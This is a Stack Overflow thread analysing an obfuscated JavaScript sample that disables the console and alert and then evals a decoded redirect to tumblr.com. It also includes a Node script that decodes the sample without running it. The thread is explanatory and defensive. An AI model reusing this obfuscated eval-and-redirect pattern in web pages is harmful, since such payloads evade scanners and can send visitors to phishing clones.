var a = ['document', 'window', String];
var b = '108 111 99 97 116 105 111 110';
var c = '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d';
var d = 'ZnJvbUNoYXJDb2Rl';
var e = 'ZGVjb2RlVVJJQ29tcG9uZW50';
var f = '1c2o3n4s5o6l7e8', g = '6a5l4e3r2t1';
function x(s) {
    var ss = s.split(' '); s = '';
    for (var i = 0; i < ss.length; i++) s += a[2][atob(d)](ss[i]);
    return s;
}
console = null;
function y(s) {
    var ss = '';
    for (var i = 1; i < s.length; i+= 2) ss += s[i];
    return ss;
}
a[1][y(f)] = a[1][y(g)] = null;
var s = a[0] + '["' + x(b) + '"]=' + a[1] + '["' + atob(e) + '"]("' + c + '")';
eval(s);

I am new to exploits and would like to know what this exploit does. How do I analyze such exploits, and what's the best approach to understanding such things? I know the basics of reverse engineering and assembly, but I was not able to figure this one out.

  • 1
    I've edited your question to remove the "Run this exploit in your browser" button, I hope you don't mind. – Álvaro González Jan 06 '16 at 15:16
  • 2
    Stack Overflow is not a good place to ask people to explain long chunks of code — especially when that code is obfuscated — you might try a more specific question about some small part of the code you don't understand. – Quentin Jan 06 '16 at 15:17
  • 1
    Just replace `eval` with `document.write` you will see decoded code. – jcubic Jan 06 '16 at 15:17
  • This is barely even mangled. Just go through and replace a few values and you'll have the whole script. –  Jan 06 '16 at 15:22
  • It's not an exploit at all, it's just a really stupid script that redirects to Tumblr, might as well be `window.location = "https://www.tumblr.com"`, which is what it ends up as. – adeneo Jan 06 '16 at 15:26
  • I edited my answer below to make it more detailed – Ludovic Zenohate Lagouardette Jan 08 '16 at 07:54

1 Answer

1

It executes the following:

document["location"]=window["decodeURIComponent"]("https://www.tumblr.com")

Which redirects you to tumblr.com.

It is pure obfuscation of code.

var s = a[0] + '["' + x(b) + '"]=' + a[1] + '["' + atob(e) + '"]("' + c + '")';
    ^   ^             ^              ^             ^                  ^
Payload=document["   (1)      "]= window     [base64 encoded   ]( url http encoded string)

The following converts ASCII character codes to a string:

(1): for (var i = 0; i < ss.length; i++) s += a[2][atob(d)](ss[i])

The main aim of doing this is to hide from software looking for XSS, like some antivirus. Yet this is only a payload; the real exploit would be a flaw allowing you to insert this on a legit website to redirect to another website that may be a clone with just a slightly different URL to trick someone. But it would be more accurate to ask about this on security.stackexchange.com.

Node is a good tool to evaluate unsafe browser JavaScript if you replace some things (like atob) with homemade equivalents.

Community
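
The approach suggested in the answer and comments (decode in Node with a homemade `atob` and capture the string instead of passing it to `eval`), as an added example that is not part of the original posts. The names `sample`, `atobShim`, `decodeCharCodes`, `everyOther` and `deobfuscate` are hypothetical; the encoded values are copied from the question.

```javascript
// Added example: static decode of the question's script. Nothing is eval'd.
// Encoded values copied from the question; all function names are hypothetical.
const sample = {
  a: ['document', 'window', String],
  b: '108 111 99 97 116 105 111 110',
  c: '%68%74%74%70%73%3a%2f%2f%77%77%77%2e%74%75%6d%62%6c%72%2e%63%6f%6d',
  d: 'ZnJvbUNoYXJDb2Rl',
  e: 'ZGVjb2RlVVJJQ29tcG9uZW50',
  f: '1c2o3n4s5o6l7e8',
  g: '6a5l4e3r2t1',
};

// Homemade atob: Node's global Buffer does the base64 decoding.
function atobShim(s) {
  return Buffer.from(s, 'base64').toString('latin1');
}

// Equivalent of x(): space-separated decimal char codes -> string.
function decodeCharCodes(s) {
  const method = atobShim(sample.d); // decodes to 'fromCharCode'
  return s.split(' ').map(n => sample.a[2][method](Number(n))).join('');
}

// Equivalent of y(): keep every second character, starting at index 1.
function everyOther(s) {
  let out = '';
  for (let i = 1; i < s.length; i += 2) out += s[i];
  return out;
}

// Rebuild the string the sample hands to eval and return it for inspection.
function deobfuscate() {
  const { a, b, c, e, f, g } = sample;
  const payload = a[0] + '["' + decodeCharCodes(b) + '"]=' + a[1] +
                  '["' + atobShim(e) + '"]("' + c + '")';
  return {
    hiddenNames: [everyOther(f), everyOther(g)], // property names hidden in f and g
    method: atobShim(e),                         // function name hidden in e
    payload,                                     // argument of the original eval
    target: decodeURIComponent(c),               // decoded redirect destination
  };
}

console.log(deobfuscate());
```
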